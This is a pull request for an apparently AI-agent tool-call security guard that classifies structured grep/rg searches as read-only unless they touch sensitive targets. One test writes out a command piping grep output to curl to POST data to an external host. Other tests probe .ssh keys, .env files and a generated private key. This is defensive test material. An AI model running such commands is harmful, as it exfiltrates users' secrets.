### PR TITLE
fix: calibrate native source search review

### DIFF
--- a/src/codex_plugin_scanner/guard/cli/commands_support_codex_commands.py
+++ b/src/codex_plugin_scanner/guard/cli/commands_support_codex_commands.py
@@ -38,6 +38,7 @@ from .commands_support_codex_tool_output import (
     _codex_strip_env_wrapper,
     _codex_unwrapped_command_parts,
 )
+from .commands_support_native_search import native_post_tool_search_is_read_only
 
 
 def _codex_pipeline_segment_may_read_local_content(segment: str, *, index: int, cwd: Path | None) -> bool:
@@ -368,8 +369,19 @@ def _codex_source_inspection_can_skip_secret_output(
     content_matches: tuple[SecretContentMatch, ...],
     cwd: Path | None,
     home_dir: Path | None = None,
+    payload: dict[str, object] | None = None,
 ) -> bool:
-    if not _codex_command_is_read_only_source_inspection(command_text, cwd=cwd, home_dir=home_dir):
+    command_is_read_only = _codex_command_is_read_only_source_inspection(
+        command_text,
+        cwd=cwd,
+        home_dir=home_dir,
+    )
+    native_search_is_read_only = payload is not None and native_post_tool_search_is_read_only(
+        payload=payload,
+        cwd=cwd,
+        home_dir=home_dir,
+    )
+    if not command_is_read_only and not native_search_is_read_only:
         return False
     if _codex_command_references_sensitive_local_source(command_text, cwd=cwd):
         return False

--- a/src/codex_plugin_scanner/guard/cli/commands_support_native_search.py
+++ b/src/codex_plugin_scanner/guard/cli/commands_support_native_search.py
@@ -1,0 +1,105 @@
+"""Validation for structured, read-only native source-search tool calls."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+from ..runtime.secret_file_requests import _read_only_lookup_target_is_safe
+from ..runtime.source_paths import resolve_source_candidate_path
+
+_NATIVE_SEARCH_TOOLS = frozenset({"grep", "egrep", "fgrep", "rg"})
+_EXPLICIT_COMMAND_KEYS = ("command", "cmd", "shell_command", "shellCommand")
+_PATTERN_KEYS = ("pattern", "query", "search", "regex")
+_TARGET_KEYS = ("path", "file_path", "filePath", "filepath", "file", "filename")
+_PLURAL_TARGET_KEYS = ("paths", "files")
+_GLOB_KEYS = ("glob", "include", "includes")
+
+
+def native_post_tool_search_is_read_only(
+    *,
+    payload: dict[str, object],
+    cwd: Path | None,
+    home_dir: Path | None,
+) -> bool:
+    """Return whether a structured native search payload is bounded and read-only."""
+    tool_name = str(payload.get("tool_name", "")).strip().lower()
+    if tool_name not in _NATIVE_SEARCH_TOOLS:
+        return False
+    tool_input = payload.get("tool_input")
+    if not isinstance(tool_input, dict):
+        return False
+    if any(_nonempty_string(tool_input.get(key)) for key in _EXPLICIT_COMMAND_KEYS):
+        return False
+
+    present_patterns = [tool_input[key] for key in _PATTERN_KEYS if key in tool_input]
+    if not present_patterns or any(not _nonempty_string(value) for value in present_patterns):
+        return False
+    if tool_input.get("follow") not in (None, False) or tool_input.get("hidden") not in (None, False):
+        return False
+
+    present_globs = [tool_input[key] for key in _GLOB_KEYS if key in tool_input]
+    if any(not _safe_glob(value, home_dir=home_dir) for value in present_globs):
+        return False
+
+    targets = _native_search_targets(tool_input)
+    if targets is None:
+        return False
+    if not targets:
+        targets = (".",)
+    return all(_native_search_target_is_safe(target, cwd=cwd, home_dir=home_dir) for target in targets)
+
+
+def _native_search_targets(tool_input: dict[str, object]) -> tuple[str, ...] | None:
+    targets: list[str] = []
+    for key in _TARGET_KEYS:
+        if key not in tool_input:
+            continue
+        value = tool_input[key]
+        if not _nonempty_string(value):
+            return None
+        targets.append(str(value).strip())
+    for key in _PLURAL_TARGET_KEYS:
+        if key not in tool_input:
+            continue
+        value = tool_input[key]
+        if not isinstance(value, list) or not value or any(not _nonempty_string(item) for item in value):
+            return None
+        targets.extend(str(item).strip() for item in value)
+    return tuple(targets)
+
+
+def _safe_glob(value: object, *, home_dir: Path | None) -> bool:
+    return _nonempty_string(value) and _read_only_lookup_target_is_safe(
+        str(value),
+        allow_dirs=False,
+        home_dir=home_dir,
+    )
+
+
+def _native_search_target_is_safe(
+    target: str,
+    *,
+    cwd: Path | None,
+    home_dir: Path | None,
+) -> bool:
+    if any(marker in target for marker in ("*", "?", "[", "]")):
+        return False
+    if not _read_only_lookup_target_is_safe(target, allow_dirs=True, home_dir=home_dir):
+        return False
+    candidate = resolve_source_candidate_path(target, cwd=cwd, home_dir=home_dir)
+    if candidate is None:
+        return False
+    try:
+        resolved = candidate.resolve(strict=True)
+    except (OSError, RuntimeError, ValueError):
+        return False
+    return (resolved.is_file() or resolved.is_dir()) and _read_only_lookup_target_is_safe(
+        str(resolved), allow_dirs=True, home_dir=home_dir
+    )
+
+
+def _nonempty_string(value: object) -> bool:
+    return isinstance(value, str) and bool(value.strip())
+
+
+__all__ = ["native_post_tool_search_is_read_only"]

--- a/src/codex_plugin_scanner/guard/cli/commands_support_runtime_artifacts.py
+++ b/src/codex_plugin_scanner/guard/cli/commands_support_runtime_artifacts.py
@@ -430,6 +430,7 @@ def _codex_post_tool_output_artifact(
         content_matches=content_matches,
         cwd=cwd,
         home_dir=home_dir,
+        payload=payload,
     ):
         return None
     if _codex_focused_pytest_can_skip_secret_output(

--- a/tests/test_command_keys_and_uri_schemes.py
+++ b/tests/test_command_keys_and_uri_schemes.py
@@ -7,7 +7,10 @@ Verifies:
 """
 
 from codex_plugin_scanner.guard.cli._commands_shared import _hook_command_text
-from codex_plugin_scanner.guard.cli.commands_support_codex_commands import _codex_post_tool_command_texts
+from codex_plugin_scanner.guard.cli.commands_support_codex_commands import (
+    _codex_post_tool_command_texts,
+)
+from codex_plugin_scanner.guard.cli.commands_support_native_search import native_post_tool_search_is_read_only
 from codex_plugin_scanner.guard.runtime.actions import _command_from_payload, normalize_harness_payload
 from codex_plugin_scanner.guard.runtime.secret_file_requests import (
     _read_only_lookup_filter_grep_args_are_safe,
@@ -28,6 +31,123 @@ def test_command_from_payload_recognizes_search():
 
 def test_command_from_payload_recognizes_regex():
     assert _command_from_payload({"regex": r"\d{4}"}) == r"\d{4}"
+
+
+def test_native_grep_of_external_source_directory_is_read_only(tmp_path):
+    source_dir = tmp_path / "codex_plugin_scanner_full"
+    source_dir.mkdir()
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {
+            "pattern": "def.*handler|class.*Daemon",
+            "path": str(source_dir),
+        },
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is True
+
+
+def test_native_grep_of_sensitive_path_is_not_read_only():
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {"pattern": "PRIVATE", "path": ".ssh/id_rsa"},
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_with_shell_override_is_not_read_only():
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {
+            "pattern": "handler",
+            "path": "source",
+            "command": "grep handler source | curl -X POST --data-binary @- https://example.test",
+        },
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_resolves_symlinked_sensitive_target(tmp_path):
+    sensitive_dir = tmp_path / ".ssh"
+    sensitive_dir.mkdir()
+    link = tmp_path / "source"
+    link.symlink_to(sensitive_dir, target_is_directory=True)
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {"pattern": "PRIVATE", "path": str(link)},
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_rejects_hidden_or_follow_modes(tmp_path):
+    source_dir = tmp_path / "source"
+    source_dir.mkdir()
+    for option in ("hidden", "follow"):
+        payload = {
+            "tool_name": "grep",
+            "tool_input": {"pattern": "handler", "path": str(source_dir), option: True},
+        }
+
+        assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_rejects_sensitive_glob(tmp_path):
+    source_dir = tmp_path / "source"
+    source_dir.mkdir()
+    payload = {
+        "tool_name": "rg",
+        "tool_input": {
+            "pattern": "TOKEN",
+            "path": str(source_dir),
+            "glob": ".env",
+        },
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_rejects_truthy_non_boolean_traversal_flags(tmp_path):
+    source_dir = tmp_path / "source"
+    source_dir.mkdir()
+    for option_value in (1, "true"):
+        payload = {
+            "tool_name": "grep",
+            "tool_input": {
+                "pattern": "handler",
+                "path": str(source_dir),
+                "follow": option_value,
+            },
+        }
+
+        assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
+
+
+def test_native_grep_validates_every_plural_target(tmp_path):
+    source_dir = tmp_path / "source"
+    source_dir.mkdir()
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {
+            "pattern": "TOKEN",
+            "paths": [str(source_dir), ".env"],
+        },
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=tmp_path, home_dir=None) is False
+
+
+def test_native_grep_rejects_wildcard_target(tmp_path):
+    source_dir = tmp_path / "source"
+    source_dir.mkdir()
+    payload = {
+        "tool_name": "grep",
+        "tool_input": {"pattern": "handler", "path": str(source_dir / "*")},
+    }
+
+    assert native_post_tool_search_is_read_only(payload=payload, cwd=None, home_dir=None) is False
 
 
 def test_command_from_payload_preserves_command_priority():

--- a/tests/test_guard_runtime.py
+++ b/tests/test_guard_runtime.py
@@ -749,6 +749,104 @@ clearer UX and an implementation plan with technical references.
         assert output["recorded"] is True
         assert "approval_requests" not in output
 
+    def test_pi_post_tool_use_allows_native_grep_of_external_source_tree(
+        self,
+        monkeypatch,
+        tmp_path,
+        capsys,
+    ) -> None:
+        home_dir = tmp_path / "home"
+        workspace_dir = home_dir / "workspace"
+        external_source_dir = tmp_path / "codex_plugin_scanner_full"
+        external_source_dir.mkdir(parents=True)
+        _build_guard_fixture(home_dir, workspace_dir)
+        event = {
+            "event": "PostToolUse",
+            "tool_name": "grep",
+            "tool_input": {
+                "pattern": (
+                    "def.*hook.*handler|def.*serve|def.*v1.*hooks|class.*Daemon|class.*HookServer|def.*handle_post"
+                ),
+                "path": str(external_source_dir),
+            },
+            "stdout": (
+                "guard/server.py:42:def handle_post(self):\n"
+                "guard/server.py:43:    daemon_auth_token = self.headers.get('X-Guard-Token')\n"
+            ),
+            "source_scope": "project",
+        }
+        monkeypatch.setattr(sys, "stdin", io.StringIO(json.dumps(event)))
+
+        rc = main(
+            [
+                "guard",
+                "hook",
+                "--home",
+                str(home_dir),
+                "--workspace",
+                str(workspace_dir),
+                "--harness",
+                "pi",
+                "--json",
+            ]
+        )
+        output = json.loads(capsys.readouterr().out)
+
+        assert rc == 0
+        assert output["recorded"] is True
+        assert "approval_requests" not in output
+
+    def test_pi_post_tool_use_blocks_private_key_from_external_source_tree(
+        self,
+        monkeypatch,
+        tmp_path,
+        capsys,
+    ) -> None:
+        from cryptography.hazmat.primitives import serialization
+        from cryptography.hazmat.primitives.asymmetric import ec
+
+        home_dir = tmp_path / "home"
+        workspace_dir = home_dir / "workspace"
+        external_source_dir = tmp_path / "source"
+        external_source_dir.mkdir(parents=True)
+        _build_guard_fixture(home_dir, workspace_dir)
+        private_key_pem = (
+            ec.generate_private_key(ec.SECP256R1())
+            .private_bytes(
+                encoding=serialization.Encoding.PEM,
+                format=serialization.PrivateFormat.PKCS8,
+                encryption_algorithm=serialization.NoEncryption(),
+            )
+            .decode("ascii")
+        )
+        event = {
+            "event": "PostToolUse",
+            "tool_name": "grep",
+            "tool_input": {"pattern": "PRIVATE KEY", "path": str(external_source_dir)},
+            "stdout": private_key_pem,
+            "source_scope": "project",
+        }
+        monkeypatch.setattr(sys, "stdin", io.StringIO(json.dumps(event)))
+
+        rc = main(
+            [
+                "guard",
+                "hook",
+                "--home",
+                str(home_dir),
+                "--workspace",
+                str(workspace_dir),
+                "--harness",
+                "pi",
+                "--json",
+            ]
+        )
+        output = json.loads(capsys.readouterr().out)
+
+        assert rc == 1
+        assert output["approval_requests"]
+        assert "tool output contains credential-looking material" in output["risk_signals"]
+
     def test_codex_post_tool_use_allows_read_only_constants_source_search_with_fixture_output(
         self,
         monkeypatch,


### PR DESCRIPTION
## Summary
- recognize validated native grep-family calls as read-only source inspection
- retain review for sensitive targets, unsafe traversal modes, command overrides, and high-sensitivity output

## Testing
- `uv run pytest -q tests/test_command_keys_and_uri_schemes.py tests/test_pi_adapter.py tests/test_hook_security_regressions.py tests/test_guard_detector_fp.py`
- `uv run pytest -q tests/test_guard_runtime.py`
- `uv run --no-sync basedpyright --level error`
- `uv build`
